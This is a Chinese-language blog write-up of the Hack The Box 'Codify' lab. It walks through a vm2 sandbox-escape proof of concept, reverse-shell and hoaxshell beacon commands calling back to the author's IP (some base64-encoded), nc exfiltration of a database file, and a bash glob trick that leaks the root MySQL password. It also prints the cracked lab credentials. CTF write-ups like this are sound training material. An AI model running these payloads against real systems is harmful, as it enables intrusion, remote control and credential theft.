Codify

Htb

 2023/11/12 

这几天打的人可能有点多网卡卡的出现很多玄学报错

Codify

连接事宜

clash不能是全局代理只能规则 HTB都有重定向需要添加hosts

1 2	#HTB 10.10.11.239 codify.htb

审计

nmap扫描后发现有80端口开放(没扫也大概猜到

确实在刚开始把这题当ctf来做了大概意思能猜到提供了一个测试nodejs的网站最开始没啥头绪但是看到了nodejs sandbox 去google搜索关键字找到了最新的poc

const {VM} = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
  
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('touch pwned');
}
`

console.log(vm.run(code));

// 来源:<https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244>

尝试SSH

1	/bin/bash -i >& /dev/tcp/10.10.16.43/443 0>&1

把touch pwned改为上述语句尝试进行反弹shell 但是好像不行那就换一下使用curl进行ssrf

curl 10.10.16.43 | bash

Villain > generate payload=linux/hoaxshell/sh_curl lhost=utun2
Generating backdoor payload...
nohup bash -c 's=10.10.16.43:8080&&i=593c8a-9cf9b9-b36a4c&&hname=$(hostname)&&p=http://;curl -s "$p$s/593c8a/$hname/$USER" -H "Authorization: $i" -o /dev/null&&while :; do c=$(curl -s "$p$s/9cf9b9" -H "Authorization: $i")&&if [ "$c" != None ]; then r=$(eval "$c" 2>&1)&&echo $r;if [ $r == byee ]; then pkill -P $$; else curl -s $p$s/b36a4c -X POST -H "Authorization: $i" -d "$r";echo $$;fi; fi; sleep 0.8; done;' & disown

不知道是不是当时网络环境比较恶劣那会也是没成功这个villain说实话有点东西后来想了想觉得可能用编码可以

1	echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjQzLzQ0MyAwPiYx \| base64 -d \| sh

更玄学的一点是在下午的时候每个空格要敲两到三个才行直接用反弹shell的语句进行base64解码好像也不行那就用villain的那段尝试直接在villain中进行shell连接

echo bm9odXAgYmFzaCAtYyAncz0xMC4xMC4xNi40Mzo4MDgwJiZpPTU5M2M4YS05Y2Y5YjktYjM2YTRjJiZobmFtZT0kKGhvc3RuYW1lKSYmcD1odHRwOi8vO2N1cmwgLXMgIiRwJHMvNTkzYzhhLyRobmFtZS8kVVNFUiIgLUggIkF1dGhvcml6YXRpb246ICRpIiAtbyAvZGV2L251bGwmJndoaWxlIDo7IGRvIGM9JChjdXJsIC1zICIkcCRzLzljZjliOSIgLUggIkF1dGhvcml6YXRpb246ICRpIikmJmlmIFsgIiRjIiAhPSBOb25lIF07IHRoZW4gcj0kKGV2YWwgIiRjIiAyPiYxKSYmZWNobyAkcjtpZiBbICRyID09IGJ5ZWUgXTsgdGhlbiBwa2lsbCAtUCAkJDsgZWxzZSBjdXJsIC1zICRwJHMvYjM2YTRjIC1YIFBPU1QgLUggIkF1dGhvcml6YXRpb246ICRpIiAtZCAiJHIiO2VjaG8gJCQ7Zmk7IGZpOyBzbGVlcCAwLjg7IGRvbmU7JyAmIGRpc293bg==  | base64 -d |  sh

[Shell] Backdoor session established on 10.10.11.239
Villain > sessions

Session ID            IP Address    OS Type  User                 Owner  Status
--------------------  ------------  -------  -------------------  -----  ------
593c8a-9cf9b9-b36a4c  10.10.11.239  Linux    Undefined@Undefined  Self   Active

Villain > shell 593c8a-9cf9b9-b36a4c

This session is unstable. Consider running a socket-based rshell process in it.
Interactive pseudo-shell activated.
Press Ctrl + C or type "exit" to deactivate.

Undefined@Undefined: id
uid=1001(svc) gid=1001(svc) groups=1001(svc)

成功连上shell了但是这个shell是个半残的只能用ls -al查看

svc@codify: ls -al /var/www
total 20
drwxr-xr-x  5 root root 4096 Sep 12 17:40 .
drwxr-xr-x 13 root root 4096 Oct 31 07:57 ..
drwxr-xr-x  3 svc  svc  4096 Sep 12 17:45 contact
drwxr-xr-x  4 svc  svc  4096 Sep 12 17:46 editor
drwxr-xr-x  2 svc  svc  4096 Apr 12  2023 html

在contact目录下有个db文件明显是需要进一步查看的

1 2	靶机: nc 10.10.16.43 443 < tickets.db mac: nc -l 443 > tickets.db

下载下来后就可以用john跑里面的用户名密码了至此Users flag拿到

1	joshua:spongebob1

提权

到这后本来想用之前ssh的payload 但是用不了查看一下当前所拥有的权限

joshua@codify:~$ sudo -l
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh

看到运行mysql-backup.sh可以获取root权限打开看眼

joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'

确实发现在该文件中确实有登录root用户的行为并且对输入的用户名没有限制过滤那么对于bash文件可以利用特性进行盲注

joshua@codify:~$ echo "k*" | sudo /opt/scripts/mysql-backup.sh
[sudo] password for joshua:

Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions
Done!

joshua@codify:~$ echo "l*" | sudo /opt/scripts/mysql-backup.sh

Password confirmation failed!

当然直接输入一个*也行之后可以使用pspy64对linux进行监控拿到root密码

1	/usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 mysql

Author：Eureka

Link：https://dawoxiansigema.github.io/2023/11/12/Codify/

Publish date：November 12th 2023, 6:18:00 pm

Update date：November 12th 2023, 9:12:55 pm

License：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

Previous Post

CozyHosting

CATALOG

1. Codify